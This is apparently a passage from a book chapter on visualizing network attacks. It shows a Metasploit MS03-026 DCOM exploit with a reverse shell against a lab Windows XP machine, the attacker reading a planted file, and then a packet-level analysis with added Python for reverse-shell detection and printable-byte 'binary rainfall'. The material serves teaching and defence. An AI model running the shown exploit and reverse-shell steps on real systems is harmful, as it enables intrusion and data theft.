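if __name__ == "__main__":
    for a in reverse_shell_alerts(build_flows()):
        print(a)
```

The medium-confidence rule is the one that survives an attacker changing LPORT: any prompt outbound connection from a server back to a peer that just touched an exploitable service is worth a look. It will also fire on protocols where a server legitimately calls the client back, so tune EXPLOITED_SERVICES and WINDOW_SEC to the environment rather than shipping the values assumed here.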

Executing the Attack


Now that I’ve configured everything correctly, I’ll execute the attack using the exploit command.

msf msrpc_dcom_ms03_026(win32_reverse) > set LHOST [Link]
LHOST -> [Link]
msf msrpc_dcom_ms03_026(win32_reverse) > exploit
[*] Starting Reverse Handler.
[*] Sending request...
[*] Got connection from [Link]:4321 <-> [Link]:1063

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

Success! I now have command-line access on the target computer.


Earlier, as I was creating this scenario, I placed a secret file ([Link]) on
the target computer in a directory called topsecret. Let’s see if I can use my
newfound access to view this file. I use the cd \topsecret command to tell the
target computer to change to the topsecret directory, and then I use the dir
command to tell it to list the directory’s contents. Finally, I use the type
command to view the contents of the only file in the directory. It turns out
that [Link] contains the United States Bill of Rights, a portion of which
appears below. After displaying the contents of the file, the reverse shell
returns the attacker to the command line. At this point, the attacker
maintains complete access to the target machine and can proceed as desired.

C:\WINDOWS\system32>cd \topsecret

C:\topsecret>dir
 Volume in drive C has no label.
 Volume Serial Number is 42F9-BC37

 Directory of C:\topsecret

04/05/2002  01:28 PM    <DIR>          .
04/05/2002  01:28 PM    <DIR>          ..
09/28/2006  11:27 PM             3,725 [Link]
               1 File(s)          3,725 bytes
               2 Dir(s)   4,104,339,456 bytes free

C:\topsecret>type [Link]
THE BILL OF RIGHTS

Amendments 1-10 of the Constitution

The Conventions of a number of the States having, at the time of adopting the
Constitution, expressed a desire, in order to prevent misconstruction or abuse
of its powers, that further declaratory and restrictive clauses should be
added, and as extending the ground of public confidence in the Government will
best insure the beneficent ends of its institution;

<snip>

The right of the people to be secure in their persons, houses, papers, and
effects, against unreasonable searches and seizures, shall not be violated, and
no warrants shall issue, but upon probable cause, supported by oath or
affirmation, and particularly describing the place to be searched, and the
persons or things to be seized.

<snip>

Determining the Source and Destination Sockets


Because the attack occurred over a network, the exploit, payload, and
subsequent reverse shell communications all exist in the underlying network
packets. From the beginning of the attack to the successful listing of the
secret file, this attack used 50 packets. Let’s examine these packets to see
how the attack took place. As we examine the data, we should see two distinct
phases: the initial exploitation of port 135 and the subsequent reverse shell
activity. To help us tease apart the attack, recall that I targeted the
service running on port 135 of the target machine, [Link].

NOTE The combination of an IP address and transport layer port is called a socket, and it
uniquely identifies a communicating process anywhere on the Internet.10 Sockets are
often abbreviated in IPAddress:Port format, such as [Link]:135.

I also configured the reverse shell payload to communicate back to
port 4321 on my attack machine, [Link]:4321. We don’t know the
source port number the attacking machine’s operating system chose for
the Metasploit attack, nor do we know the port number of the reverse shell
process on the target machine. We’d like to know these values so we can
fully understand the nature of Metasploit’s behavior. Figure 4-14 uses the
now familiar parallel coordinate plot of source IP address, source TCP
port, destination TCP port, and destination IP address to fill in these
two missing pieces of information. Note that the initial Metasploit attack
against port 135 was launched from port 1267, and the reverse shell back to
port 4321 came from port 1063. To summarize, the following two pairings
identify the processes in use.

Initial exploitation phase

(Attacker) [Link]:1267 <-----> (Target) [Link]:135

Reverse shell activity

(Attacker) [Link]:4321 <-----> (Target) [Link]:1063

10 In certain instances, IP addresses are hidden behind a firewall and may not be unique across
the entire Internet.

[Figure 4-14 image: parallel coordinate plot with axes Source IP address, Source TCP port, TCP destination port, and Destination IP address; the Exploit and Reverse shell line groups are labeled.]

Figure 4-14: By using the parallel coordinate plot to confirm the initial attack against
port 135, we can see that it came from port 1267. In addition, we can see that the
reverse shell activity occurred on my chosen port, 4321, and the port chosen by the
target’s operating system, 1063.

Analyzing the Initial Exploitation and Follow-up Activity
In order to continue our exploration of the attack, let’s use two additional
visualization techniques to observe what occurred. A packet length display
(Figure 4-15) shows two distinct clusters of large packets. Based on our
knowledge of the attack, we can deduce that the top cluster of large packets
is probably the exploit and that the bottom cluster is probably the reverse
shell. Unfortunately, a simple bar graph of packet lengths doesn’t allow us
to confirm our instincts.

[Figure 4-15 image: packet length display, vertical axis Packets (1 to 50), horizontal axis Packet length (bytes) (0 to 1518).]

Figure 4-15: Comparing packet lengths. Note the two clusters of larger packets at the top
and bottom of the display. The first likely contains the initial attack, and the second likely
depicts the subsequent shell activity. The next figure explores this hypothesis further.

Figure 4-16 shows the same packets using a technique I developed
called the binary rainfall.11 Similar to the packet length visualization, the
binary rainfall shows one packet per line and depicts packet length. I’ll go
into more detail in Chapter 6, but for now, just understand that the binary
rainfall also color-codes pixels based on the bytes within the packets, letting
us quickly view the actual contents of many packets without resorting to
viewing them as text. In Figure 4-16, I used blue to depict bytes containing
printable ASCII characters and gray to represent all other bytes; the more
intense the blue, the greater the density of printable characters. Notice
that the bottom cluster of large packets glows bright blue because of the
command-line activity and the display of the secret file. The top cluster has
few printable ASCII characters and is indicative of the exploit and reverse
shell payload. In the future, I believe it will be possible to use knowledge
of the statistical makeup of executable files to help identify code within
packets, similar to what I did here with printable characters.

11
For more information, see Gregory J. Conti, Julian B. Grizzard, Mustaque Ahamad, and
Henry L. Owen’s “Visual Exploration of Malicious Network Objects Using Semantic Zoom,
Interactive Encoding and Dynamic Queries” from VizSEC 2005.

[Figure 4-16 image: binary rainfall of the same 50 packets, vertical axis Packets (1 to 50), horizontal axis Packet length (bytes); printable ASCII bytes shown in blue, all other bytes in gray.]

Figure 4-16: Using color to highlight printable ASCII bytes in the network packets so
that the reverse shell activity in the lower region stands out. The top region contains
few printable ASCII bytes and is likely the initial exploit.
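As an added example (not the book's own code), the following Python computes the per-packet printable-ASCII density that the binary rainfall color-codes and renders each packet as one text row, so an exploit payload and the later shell traffic separate the way Figures 4-15 and 4-16 show. The sample packets, the five-character shade ramp, and the 0.9 text threshold are constructed for illustration.

```python
# Printable ASCII as the book uses it: space through tilde plus tab, CR and LF.
PRINTABLE = frozenset(range(0x20, 0x7F)) | frozenset(b"\t\r\n")
RAMP = " .:+#"  # five text shades standing in for the book's blue intensity


def printable_density(payload: bytes) -> float:
    """Fraction of bytes that are printable ASCII; 0.0 for an empty payload."""
    if not payload:
        return 0.0
    return sum(1 for b in payload if b in PRINTABLE) / len(payload)


def shade(density: float) -> str:
    """Map a density in [0, 1] to one character of RAMP (1.0 is the brightest)."""
    return RAMP[min(len(RAMP) - 1, int(density * len(RAMP)))]


def rainfall_rows(packets, bytes_per_cell: int = 16):
    """One text row per packet and one cell per bytes_per_cell bytes, shaded by
    printable density. Row length tracks packet length, so the display is also
    a crude packet length plot in the spirit of Figure 4-15."""
    rows = []
    for num, payload in enumerate(packets, 1):
        cells = "".join(shade(printable_density(payload[i:i + bytes_per_cell]))
                        for i in range(0, len(payload), bytes_per_cell))
        rows.append(f"{num:3d} |{cells}")
    return rows


def classify(payload: bytes, threshold: float = 0.9) -> str:
    """'text' when a payload is mostly printable (command-line traffic), else 'binary'."""
    return "text" if printable_density(payload) >= threshold else "binary"


# Constructed sample packets in the order the book's capture shows them:
# an exploit request of mostly non-printable bytes, a typed command, shell output.
SAMPLE = [
    bytes(range(256)) * 4,                   # stand-in for the exploit/payload bytes
    b"dir\r\n",                              # command sent to the reverse shell
    b" Directory of C:\\topsecret\r\n               1 File(s)          3,725 bytes\r\n",
]

if __name__ == "__main__":
    for row, payload in zip(rainfall_rows(SAMPLE), SAMPLE):
        print(f"{row}  {classify(payload)}")
```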

Stepping Through the Attack


Now that we know the ports in use and the general clusters of activity,
let’s combine this knowledge with several visualization techniques to step
through the attack. To help the analysis, I’ve divided the packets into two
datasets—those sent by the attacker and those sent by the target—because
I want to analyze the activities of each one individually. I’ve found that
separating the inbound and outbound traffic in this way greatly reduces
the clutter in the visualization displays. I don’t propose this approach as a
general-purpose solution, but you may find it a useful analytic technique.

The combined visualization in the upper-right corner of Figure 4-17
shows the first dataset, the attacker’s communication with the target
machine. The attack begins with the attacker sending a number of packets
to the vulnerable service listening on port 135. Of these, the most
interesting are the large packets (4, 5, and 7) of non-printable ASCII
characters. These are the same packets I pointed out in the binary rainfall
display, and they are visible at the bottom of Figure 4-17. As I mentioned
earlier, visual analysis of malicious payloads, also known as shellcode, is an
open research area. I’ve simply resorted to using a text display to view the
hexadecimal packet payloads. Moving on to the reverse shell listening on
port 1063 (Figure 4-17, upper left), an examination of the packets sent to
this port clearly shows the commands I issued to the target computer while
using Metasploit: cd \topsecret (packet 13), dir (packet 16), and type [Link]
(packet 19).

NOTE Visualization of shellcode is an area ripe for additional work. If you are interested in
exploring this further, Hack Proofing Your Network by Ryan Russell (Syngress,
2002) and Hacker Disassembling Uncovered by Kris Kaspersky (A-List, 2007)
are both good starting points.
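The two socket pairings read off Figure 4-14 in "Determining the Source and Destination Sockets" and the attacker/target split used in this section can both be recovered from a capture programmatically. The Python below is an added example, not the book's code; it works over a constructed capture with TEST-NET placeholder addresses standing in for the book's redacted hosts and illustrative packet numbers.

```python
from collections import defaultdict, namedtuple

Packet = namedtuple("Packet", "num src sport dst dport payload")

# Placeholder addresses (TEST-NET); the book's real addresses are not reproduced here.
ATTACKER, TARGET = "192.0.2.10", "192.0.2.20"
EXPLOIT_PORT = 135    # RPC DCOM service targeted by msrpc_dcom_ms03_026
REVERSE_PORT = 4321   # Metasploit's default LPORT, left unchanged in the book

# Constructed capture following the book's narrative; packet numbers are illustrative.
CAPTURE = [
    Packet(1, ATTACKER, 1267, TARGET, 135, b""),                # connection to the service
    Packet(2, TARGET, 135, ATTACKER, 1267, b""),
    Packet(4, ATTACKER, 1267, TARGET, 135, bytes(range(256))),  # exploit request
    Packet(9, TARGET, 1063, ATTACKER, 4321, b""),               # reverse shell calls home
    Packet(13, ATTACKER, 4321, TARGET, 1063, b"cd \\topsecret\r\n"),
    Packet(14, TARGET, 1063, ATTACKER, 4321, b"C:\\topsecret>"),
    Packet(16, ATTACKER, 4321, TARGET, 1063, b"dir\r\n"),
]


def flows(packets):
    """Group packets by socket pair regardless of direction: {(sockA, sockB): [pkts]}."""
    groups = defaultdict(list)
    for p in packets:
        key = tuple(sorted([(p.src, p.sport), (p.dst, p.dport)]))
        groups[key].append(p)
    return groups


def identify_phases(packets):
    """Return {'exploit': (attacker_sock, target_sock), 'reverse_shell': (...)}.
    The known ends (target:135, attacker:4321) reveal the OS-chosen ephemeral ports."""
    phases = {}
    for pair in flows(packets):
        by_host = {sock[0]: sock for sock in pair}
        if {ATTACKER, TARGET} <= set(by_host):      # skip unrelated traffic
            att, tgt = by_host[ATTACKER], by_host[TARGET]
            if tgt[1] == EXPLOIT_PORT:
                phases["exploit"] = (att, tgt)
            elif att[1] == REVERSE_PORT:
                phases["reverse_shell"] = (att, tgt)
    return phases


def split_by_sender(packets):
    """The book's two datasets: what the attacker sent and what the target sent."""
    return ([p for p in packets if p.src == ATTACKER],
            [p for p in packets if p.src == TARGET])


def shell_commands(packets, shell_port: int):
    """Commands typed into the reverse shell: attacker payloads sent to shell_port."""
    return [p.payload.decode("ascii", "replace").strip()
            for p in packets if p.src == ATTACKER and p.dport == shell_port and p.payload]
```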

[Figure 4-17 image: combined visualization of the attacker’s packets, with axes Source IP address and Destination port. Labeled regions: “Outbound reverse shell commands (port 1063)” (upper left), “Exploit and payload packets (port 135)” (upper right), and text displays of Packet 4, Packet 5, and Packet 7 (bottom).]

Figure 4-17: Analyzing the attacker’s activities. The attacker initially sent a number of packets to exploit a vulnerability in port 135
(see packets 4, 5, and 7). After successfully installing the reverse shell software (listening on port 1063), the attacker sent it three
commands: cd, dir, and type.

Figure 4-18 depicts the second dataset, which contains the traffic
emanating from the target host back to the attacker. Note that the bulk of the
traffic is destined for port 4321 on the attacker’s machine. Recall that I
chose this port for the reverse shell when I configured Metasploit for the
attack. The detail view shows the payloads of the packets, also using a text
rainfall. The responses to the commands I issued using Metasploit are
clearly visible in the payload, including the listing of the secret file.

[Figure 4-18 image: combined visualization of the targeted host’s packets, with axes Source IP address and Destination port. Labeled region: “Reverse shell communications to attacker (port 4321)”.]

Figure 4-18: Analyzing the targeted host’s activities. After compromise, the targeted host
responds to the attacker’s commands via the packets in the red box. The detail region
above shows that the payload of these packets contains the text of the secret file.

Conclusions

Vulnerability assessment tools such as Nessus and easy-to-use exploitation
tools such as Metasploit have changed the landscape of network security.
Attackers of all skill levels can use these tools, in conjunction with port
scanners, to locate and compromise many networked computers. Current
techniques for visualization of network exploits, payloads, and subsequent
activity have not been perfected, but the parallel coordinate plot, combined
visualization, text rainfall, and binary rainfall constitute a powerful set of
tools to help us better understand how these attacks work and how to protect
against them. Even if an attacker obfuscates the shellcode or encrypts
his follow-up activities, these visualization techniques will work with the
unencrypted header fields to allow you to observe key aspects of the
interaction.